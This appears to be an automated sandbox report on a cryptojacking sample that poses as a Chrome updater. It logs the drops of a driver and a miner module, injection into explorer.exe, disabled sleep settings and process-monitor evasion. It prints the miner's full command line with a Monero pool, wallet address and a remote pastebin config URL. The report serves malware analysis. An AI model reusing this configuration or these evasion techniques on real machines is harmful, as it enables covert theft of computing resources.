                Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
                Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
                Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
                Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
                Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
                Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
                Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
                Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
                Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
                Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
                Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
                Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: powrprof.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: umpdc.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: napinsp.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: pnrpnsp.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wshbth.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: nlaapi.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: winrnr.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
                Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
                Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
                Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
                Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
                Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
                Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
                Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
                Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
                Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
                Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
                Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
                Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
                Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
                Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
                Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
                Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
                Source: c2.exeStatic PE information: Image base 0x140000000 > 0x60000000
                Source: c2.exeStatic file information: File size 5737472 > 1048576
                Source: c2.exeStatic PE information: Raw size of .data is bigger than: 0x100000 < 0x570e00
                Source: c2.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
                Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: conhost.exe, 00000013.00000002.4158581402.000001B6A8670000.00000004.00000001.00020000.00000000.sdmp
                Source: c2.exeStatic PE information: section name: .xdata
                Source: updater.exe.0.drStatic PE information: section name: .xdata
                Source: lnobvhjdatqu.tmp.13.drStatic PE information: section name: _RANDOMX
                Source: lnobvhjdatqu.tmp.13.drStatic PE information: section name: _TEXT_CN
                Source: lnobvhjdatqu.tmp.13.drStatic PE information: section name: _TEXT_CN
                Source: lnobvhjdatqu.tmp.13.drStatic PE information: section name: _RDATA

                Persistence and Installation Behavior

                barindex
                Sample is not signed and drops a device driver
                Source: C:\Program Files\Google\Chrome\updater.exeFile created: C:\Windows\TEMP\ppefirylicdf.sysJump to behavior
                Source: C:\Users\user\Desktop\c2.exeFile created: C:\Program Files\Google\Chrome\updater.exeJump to dropped file
                Source: C:\Program Files\Google\Chrome\updater.exeFile created: C:\Windows\Temp\ppefirylicdf.sysJump to dropped file
                Source: C:\Program Files\Google\Chrome\updater.exeFile created: C:\Windows\Temp\lnobvhjdatqu.tmpJump to dropped file
                Source: C:\Program Files\Google\Chrome\updater.exeFile created: C:\Windows\Temp\ppefirylicdf.sysJump to dropped file
                Source: C:\Program Files\Google\Chrome\updater.exeFile created: C:\Windows\Temp\lnobvhjdatqu.tmpJump to dropped file

                Hooking and other Techniques for Hiding and Protection

                barindex
                Found hidden mapped module (file has been removed from disk)
                Source: C:\Program Files\Google\Chrome\updater.exeModule Loaded: C:\WINDOWS\TEMP\LNOBVHJDATQU.TMP
                Source: C:\Program Files\Google\Chrome\updater.exeModule Loaded: C:\WINDOWS\TEMP\LNOBVHJDATQU.TMP
                Source: C:\Windows\explorer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\explorer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Query firmware table information (likely to detect VMs)
                Source: C:\Windows\explorer.exeSystem information queried: FirmwareTableInformationJump to behavior
                Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                Source: explorer.exe, 00000017.00000003.1732186119.0000000000D80000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.1732250618.0000000000D65000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.1731820245.0000000000D70000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.1732232552.0000000000D84000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.1732306589.0000000000D91000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.1732279591.0000000000D8F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.4158658044.0000000000D65000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSHACKER.EXE
                Source: explorer.exe, 00000017.00000002.4158658044.0000000000CF5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: --CINIT-STEALTH-TARGETS=TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE
                Source: explorer.exe, 00000017.00000003.1732250618.0000000000D65000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.4158658044.0000000000D65000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSHACKER.EXE(
                Source: explorer.exe, 00000017.00000003.1700744936.0000000000D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: HTTPS://PASTEBIN.COM/RAW/YLG9STR0TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXEMYFQVFEXGKNMTDUY
                Source: explorer.exe, 00000017.00000003.1731740655.0000000000DA2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.1732250618.0000000000D57000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.1732135381.0000000000D51000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "STEALTH-TARGETS": "TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE",
                Source: explorer.exe, 00000017.00000002.4158658044.0000000000CF5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\WINDOWS\EXPLORER.EXE--ALGO=RX/0--URL=XMR-ASIA1.NANOPOOL.ORG:10343--USER=48LXRFPG6ASV91MQWKD8MFG7SNYGQ6RKDHQMO1RYAMJCHPKAIZWFSFAYGQXZEFM6TA4OMTJAB5BAW5GFK84AROJ6FND3XDR--PASS=--CPU-MAX-THREADS-HINT=60--CINIT-WINRING=PPEFIRYLICDF.SYS--CINIT-REMOTE-CONFIG=HTTPS://PASTEBIN.COM/RAW/YLG9STR0--CINIT-STEALTH-TARGETS=TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE--CINIT-STEALTH-FULLSCREEN--CINIT-VERSION=3.3.0--TLS--CINIT-IDLE-WAIT=1--CINIT-IDLE-CPU=100--CINIT-ID=MYFQVFEXGKNMTDUY
                Source: explorer.exe, 00000017.00000003.1732250618.0000000000D65000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXEZ
                Source: explorer.exe, 00000017.00000002.4159469003.0000000001E00000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SV91MQWKD8MFG7SNYGQ6RKDHQMO1RYAMJCHPKAIZWFSFAYGQXZEFM6TA4OMTJAB5BAW5GFK84AROJ6FND3XDRSTEALTH-TARGETSTASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXESTEALTH-FULLSCREENALGO
                Source: explorer.exe, 00000017.00000002.4158658044.0000000000D0F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.1732250618.0000000000D65000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.1731820245.0000000000D70000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.1700744936.0000000000D10000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.4158658044.0000000000CF5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.4159469003.0000000001E00000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.4158658044.0000000000D65000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE
                Source: explorer.exe, 00000017.00000003.1732186119.0000000000D80000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.1732232552.0000000000D84000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.1732306589.0000000000D91000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.1732279591.0000000000D8F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSHACKER.EXEL.EXE0343EV
                Source: explorer.exe, 00000017.00000003.1731820245.0000000000D70000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.4158658044.0000000000D65000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXEDLLL
                Source: C:\Program Files\Google\Chrome\updater.exeDropped PE file which has not been started: C:\Windows\Temp\ppefirylicdf.sysJump to dropped file
                Source: C:\Program Files\Google\Chrome\updater.exeDropped PE file which has not been started: C:\Windows\Temp\lnobvhjdatqu.tmpJump to dropped file
                Source: C:\Windows\explorer.exe TID: 7872Thread sleep count: 137 > 30Jump to behavior
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: updater.exe, 0000000D.00000002.1700987964.00007FF602816000.00000004.00000001.01000000.00000004.sdmpBinary or memory string: VmcII
                Source: explorer.exe, 00000017.00000002.4158658044.0000000000D0F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.4158658044.0000000000CB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: C:\Users\user\Desktop\c2.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\System32\conhost.exeCode function: 19_2_00007FF778011131 Sleep,Sleep,_amsg_exit,_initterm,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,_cexit,19_2_00007FF778011131
                Source: C:\Windows\System32\conhost.exeCode function: 19_2_00007FF77801B1B8 SetUnhandledExceptionFilter,19_2_00007FF77801B1B8

                HIPS / PFW / Operating System Protection Evasion

                barindex
                System process connects to network (likely due to code injection or exploit)
                Source: C:\Windows\explorer.exeNetwork Connect: 103.3.62.64 10343Jump to behavior
                Source: C:\Windows\explorer.exeNetwork Connect: 104.20.4.235 443Jump to behavior
                Source: C:\Windows\explorer.exeNetwork Connect: 51.79.145.144 10343Jump to behavior
                Found direct / indirect Syscall (likely to bypass EDR)
                Source: C:\Program Files\Google\Chrome\updater.exeNtQuerySystemInformation: Direct from: 0x7FF60281303EJump to behavior
                Source: C:\Users\user\Desktop\c2.exeNtQuerySystemInformation: Direct from: 0x7FF632AE303EJump to behavior
                Injects code into the Windows Explorer (explorer.exe)
                Source: C:\Program Files\Google\Chrome\updater.exeMemory written: PID: 7868 base: BCB010 value: 00Jump to behavior
                Maps a DLL or memory area into another process
                Source: C:\Program Files\Google\Chrome\updater.exeSection loaded: NULL target: C:\Windows\System32\conhost.exe protection: readonlyJump to behavior
                Source: C:\Program Files\Google\Chrome\updater.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: readonlyJump to behavior
                Modifies the context of a thread in another process (thread injection)
                Source: C:\Program Files\Google\Chrome\updater.exeThread register set: target process: 7808Jump to behavior
                Source: C:\Program Files\Google\Chrome\updater.exeThread register set: target process: 7868Jump to behavior
                Writes to foreign memory regions
                Source: C:\Program Files\Google\Chrome\updater.exeMemory written: C:\Windows\System32\conhost.exe base: B109AD5010Jump to behavior
                Source: C:\Program Files\Google\Chrome\updater.exeMemory written: C:\Windows\explorer.exe base: BCB010Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-dc 0Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-dc 0Jump to behavior
                Source: C:\Program Files\Google\Chrome\updater.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\System32\conhost.exeJump to behavior
                Source: C:\Program Files\Google\Chrome\updater.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exeJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-dc 0
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-dc 0
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-dc 0Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-dc 0Jump to behavior
                Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Lowering of HIPS / PFW / Operating System Security Settings

                barindex
                Modifies power options to not sleep / hibernate
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
